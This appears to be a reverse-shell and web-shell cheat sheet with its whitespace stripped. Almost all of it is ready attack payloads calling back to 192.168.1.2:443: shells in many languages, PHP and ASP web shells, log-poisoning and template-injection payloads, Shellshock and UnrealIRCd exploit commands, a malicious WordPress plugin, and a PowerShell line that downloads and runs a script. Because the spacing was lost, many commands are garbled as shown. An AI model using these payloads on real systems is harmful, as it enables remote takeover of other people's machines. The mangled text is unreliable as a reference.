Bash
BashURLEncodingNetcat
NetcatLinuxNetcatWindowsNetcatURLEncodingWebShell
ASPWebShellPHPWebShellLogPoisoningWebShellSSHFTPHTTPServerSideTemplateInjection(SSTI)
UnrealIRCd
Shellshock
SSHHTTPHTTP500InternalServerErrorCMS
WordPressOctoberJenkinsPerl
Python
Python3
PHP
Ruby
Xterm
Ncat
PowerShell
Awk
Gawk
Golang
Telnet
Java
Node
Msfvenom
WebPayloadsPHPWARJARJSPASPXLinuxPayloadsListenerNetcatListenerMetasploitMultiHandlerWindowsPayloadsListenerNetcatListenerMetasploitMultiHandlerBashbash-i>&/dev/tcp/192.168.1.2/4430>&1bash-c"bash-i>&/dev/tcp/192.168.1.2/4430>&1"0<&196;exec196<>/dev/tcp/192.168.1.2/443;sh<&196>&1962>&196bash-l>/dev/tcp/192.168.1.2/4430<&12>&1BashURLEncodingbash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22NetcatNetcatLinuxnc-e/bin/sh192.168.1.2443nc-e/bin/bash192.168.1.2443nc-c/bin/sh192.168.1.2443nc-c/bin/bash192.168.1.2443rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc192.168.1.2443>/tmp/fNetcatWindowsnc.exe-ecmd192.168.1.26443NetcatURLEncodingrm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.1.2%20443%20%3E%2Ftmp%2FfWebShellASPWebShell<%response.writeCreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>PHPWebShellBasic<?phpsystem($_GET['cmd']);?>BasicProportionsOK<?phpecho"<pre>".shell_exec($_REQUEST['cmd'])."</pre>";?>LogPoisoningWebShellLogPoisoningSSH/var/log/auth.log
ssh'<?phpsystem($_GET['cmd']);?>'@192.168.1.2/var/log/auth.log&cmd=id
LogPoisoningFTP/var/log/vsftpd.log
root@kali:~#ftp192.168.1.3Connectedto192.168.1.3.220(vsFTPd3.0.3)Name(192.168.1.2:kali):<?phpsystem($_GET['cmd']);?>331Pleasespecifythepassword.Password:<?phpsystem($_GET['cmd']);?>530Loginincorrect.Loginfailed.ftp>/var/log/vsftpd.log&cmd=id
LogPoisoningHTTP/var/log/apache2/access.log
/var/log/nginx/access.log
curl-s-H"User-Agent:<?phpsystem(\$_GET['cmd']);?>""https://192.168.1.2"User-Agent:<?phpsystem($_GET['cmd']);?>/var/log/apache2/access.log&cmd=id
/var/log/nginx/access.log&cmd=id
ServerSideTemplateInjection{%forxin().__class__.__base__.__subclasses__()%}{%if"warning"inx.__name__%}{{x()._module.__builtins__['__import__']('os').popen("python3-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'").read().zfill(417)}}{%endif%}{%endfor%}UnrealIRCdroot@kali:~#echo"AB;nc-e/bin/sh192.168.1.2443"|nc192.168.1.36667ShellshockShellshockSSHroot@kali:~#sshuser@192.168.1.3-iid_rsa'(){:;};nc192.168.1.2443-e/bin/bash'ShellshockHTTPcurl-H"User-Agent:(){:;};/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.sh"curl-H"User-Agent:(){:;};/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.cgi"ShellshockHTTP500InternalServerErrorcurl-H"User-Agent:(){:;};echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.sh"curl-H"User-Agent:(){:;};echo;echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.sh"curl-H"User-Agent:(){:;};echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.cgi"curl-H"User-Agent:(){:;};echo;echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.cgi"CMSWordPressPluginReverseShellroot@kali:~#nanoplugin.php<?php/***PluginName:Shelly*PluginURI:https://localhost*Description:LoveShelly*Version:1.0*Author:d4t4s3c*AuthorURI:https://github.com/d4t4s3c*/exec("/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'");?>root@kali:~#zipplugin.zipplugin.phpPlugins
AddNew
UploadPlugin
InstallNow
ActivatePlugin
Octoberfunctiononstart(){exec("/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'");}JenkinsStringhost="192.168.1.2";intport=443;Stringcmd="cmd.exe";Processp=newProcessBuilder(cmd).redirectErrorStream(true).start();Sockets=newSocket(host,port);InputStreampi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStreampo=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exceptione){}};p.destroy();s.close();Perlperl-e'useSocket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'PythonexportRHOST="192.168.1.2";exportRPORT=443;python-c'importsys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd)forfdin(0,1,2)];pty.spawn("/bin/sh")'python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);importpty;pty.spawn("/bin/bash")'Python3python3-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);importpty;pty.spawn("/bin/bash")'PHP<?phppassthru("rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc192.168.1.2443>/tmp/f");?>php-r'$sock=fsockopen("192.168.1.2",443);`/bin/sh-i<&3>&32>&3`;'php-r'$sock=fsockopen("192.168.1.2",443);exec("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);system("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);popen("/bin/sh-i<&3>&32>&3","r");'php-r'$sock=fsockopen("192.168.1.2",443);s
hell_exec("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh-i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'Rubyruby-rsocket-e'f=TCPSocket.open("192.168.1.2",443).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'ruby-rsocket-e'exitiffork;c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'ruby-rsocket-e'c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'Xtermxterm-display192.168.1.2:443Ncatncat192.168.1.2443-e/bin/bashPowerShellpowershell-NoP-NonI-WHidden-ExecBypass-CommandNew-ObjectSystem.Net.Sockets.TCPClient("192.168.1.2",443);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+"PS"+(pwd).Path+">";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()powershell-nop-c"$client=New-ObjectSystem.Net.Sockets.TCPClient('192.168.1.2',443);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+'PS'+(pwd).Path+'>';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"powershellIEX(New-ObjectNet.WebClient).DownloadString('https://192.168.1.2:8000/reverse.ps1')Awkawk'BEGIN{s="/inet/tcp/0/192.168.1.2/443";while(42){do{printf"shell>"|&s;s|&getlinec;if(c){while((c|&getline)>0)print$0|&s;close(c);}}while(c!="exit")close(s);}}'/dev/nullGawkgawk'BEGIN{P=443;S=">";H="192.168.1.2";V="/inet/tcp/0/"H"/"P;while(1){do{printfS|&V;V|&getlinec;if(c){while((c|&getline)>0)print$0|&V;close(c)}}while(c!="exit")close(V)}}'Golangecho'packagem
ain;import"os/exec";import"net";funcmain(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=ccmd.Run()}'>/tmp/t.go&&gorun/tmp/t.go&&rm/tmp/t.goTelnetrm-f/tmp/p;mknod/tmp/pp&&telnet192.168.1.24430/tmp/ptelnet192.168.1.280|/bin/bash|telnet192.168.1.2443Javar=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/192.168.1.2/443;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])p.waitFor()